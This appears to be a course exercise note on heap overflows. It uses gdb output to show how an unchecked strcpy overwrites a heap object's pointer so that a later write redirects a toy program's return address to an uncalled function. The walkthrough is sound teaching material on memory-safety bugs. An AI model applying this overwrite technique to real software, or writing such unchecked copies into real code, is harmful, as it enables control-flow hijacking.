# Heap Overflow

## Idea
- We may overflow a pointer to ebp + 4 (the address store for return address)
- If the pointer will be changed to a value we can control, then we can change the program flow

## Observation
- We can use `strcpy(buf2, input1);` to overwrite `g_pInput->m_buf`, for example `0xbffff7bc` for the return address
- Once the address of `g_pInput->m_buf` is changed, then we can use `g_pInput->SetString(input2)` to set the value of return address
- In this case, it will be `bar()`

        $ ./a.out
        Address of bar is 0x804874c
        buf1 = 0x804b030, buf2 = 0x804b008, g_pInput->m_buf = 0x804b020
        ebp address = 0xbffff7b8, ret = 0xbffff7bc

## Demo
    (gdb) break 72
    Breakpoint 1 at 0x8048876: file HeapOverflow.cpp, line 72.
    (gdb) break 74
    Breakpoint 2 at 0x8048888: file HeapOverflow.cpp, line 74.
    (gdb) break 75
    Breakpoint 3 at 0x804889c: file HeapOverflow.cpp, line 75.
    (gdb) run
    Starting program: /home/hubert/trend-etp-writing-secure-code/material/01/heap_overflow/a.out
    Address of bar is 0x804874c
    buf1 = 0x804b030, buf2 = 0x804b008, g_pInput->m_buf = 0x804b020
    ebp address = 0xbffff778, ret = 0xbffff77c

    Breakpoint 1, BadFunc (input1=0xbffff7bc '\375' <repeats 24 times>, "|\367\377\277", input2=0xbffff7b7 "L\207\004\b") at HeapOverflow.cpp:72
    72        strcpy(buf2, input1);
    (gdb) x buf1
    0x804b030:      0x00000000
    (gdb) x &(g_pInput->m_buf)
    0x804b020:      0x0804b030
    (gdb) x buf2
    0x804b008:      0x00000000
    (gdb) print $ebp + 4
    $2 = (void *) 0xbffff77c
    (gdb) c
    Continuing.

    Breakpoint 2, BadFunc (input1=0xbffff7bc '\375' <repeats 24 times>, "|\367\377\277", input2=0xbffff7b7 "L\207\004\b") at HeapOverflow.cpp:74
    74        g_pInput->SetString(input2);
    (gdb) x &(g_pInput->m_buf)
    0x804b020:      0xbffff77d
    (gdb) x 0xbffff77c
    0xbffff77c:     0x08048942
    (gdb) c
    Continuing.

    Breakpoint 3, BadFunc (input1=0xbffff700 "x\367\377\277\b\365ѷ\361\370շ", input2=0xbffff7b7 "L\207\004\b") at HeapOverflow.cpp:75
    (gdb) x 0xbffff77c
    0xbffff77c:     0x0804874d

    (gdb) c
    Continuing.
    Augh! I've been hacked!

    Program received signal SIGSEGV, Segmentation fault.
    0xbffff700 in ?? ()

